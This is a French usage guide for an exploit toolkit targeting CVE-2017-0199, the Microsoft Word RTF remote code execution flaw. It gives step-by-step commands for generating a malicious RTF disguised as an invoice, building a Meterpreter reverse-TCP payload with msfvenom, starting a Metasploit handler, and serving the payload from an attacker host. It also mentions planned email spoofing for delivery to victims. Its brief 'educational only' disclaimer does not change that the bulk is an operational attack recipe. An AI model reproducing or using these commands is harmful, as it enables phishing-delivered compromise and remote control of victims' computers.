
Exploit toolkit CVE-2017-0199 - v2.0 est un script python pratique qui offre un moyen rapide et efficace d'exploiter la RCE Microsoft RTF. Il peut générer un fichier RTF malveillant et délivrer metasploit / meterpreter / n'importe quel autre payload à la victime sans configuration complexe.
Exploit toolkit CVE-2017-0199 - v2.0 est un script Python pratique qui fournit un moyen rapide et efficace d'exploiter la RCE Microsoft RTF. Il peut générer un fichier RTF malveillant et délivrer une charge utile metasploit / meterpreter à la victime sans aucune configuration complexe.
Les capacités suivantes ont été introduites dans le script
- Générer un fichier RTF malveillant à l'aide de la trousse
- Exécuter la trousse en mode exploitation comme un petit serveur HTA + Web
Version : Python version 2.7.13
Fonctionnalité en cours de développement
- Envoyer automatiquement le fichier RTF malveillant généré à la victime par usurpation d'e-mail
Étape 1 : Générer un fichier RTF malveillant à l'aide de la commande suivante et l'envoyer à la victime
Syntaxe :
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Exemple :
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
Étape 2 (facultatif, si vous utilisez une charge utile MSF) : Générer la charge utile metasploit et démarrer le gestionnaire
Exemple :
Générer la charge utile :
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Démarrer le gestionnaire :
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
Étape 3 : Démarrer la trousse en mode exploitation pour délivrer les charges utiles
Syntaxe :
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Exemple :
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
Ceci est une trousse pratique pour exploiter CVE-2017-0199 (Microsoft Word RTF RCE)
Modes :
-M gen Générer uniquement le fichier RTF malveillant
Générer le fichier RTF malveillant :
-w <Filename.rtf> Nom du fichier RTF malveillant (Partagez ce fichier avec la victime).
-u <http://attacker.com/test.hta> Le chemin vers un fichier hta. Normalement, il s'agit d'un domaine ou d'une adresse IP où cet outil est exécuté.
Par exemple, http://attackerip.com/test.hta (Cette URL sera incluse dans le fichier RTF malveillant et
sera demandée dès que la victime ouvrira le fichier RTF malveillant.
-M exp Démarrer le mode exploitation
Exploitation :
-p <TCP port:Default 80> Numéro de port local.
-e <http://attacker.com/shell.exe> Le chemin d'un fichier exécutable / shell meterpreter / charge utile qui doit être exécuté sur la cible.
-l </tmp/shell.exe> Chemin local d'un fichier exécutable / shell meterpreter / charge utile (si la charge utile est hébergée localement).
Ce programme est UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. L'avertissement habituel s'applique, notamment le fait que moi (bhdresh) ne suis pas responsable des dommages causés par une utilisation directe ou indirecte des informations ou des fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet ne porte AUCUNE responsabilité quant au contenu ou à la mauvaise utilisation de ces programmes ou de leurs dérivés. En utilisant ce programme, vous acceptez le fait que tout dommage (perte de données, crash du système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de bhdresh.
@nixawk pour l'échantillon RTF, @bhdresh
Évidemment, je ne suis pas développeur à temps plein, attendez-vous donc à quelques accrocs
Veuillez signaler les bugs et problèmes à [email protected]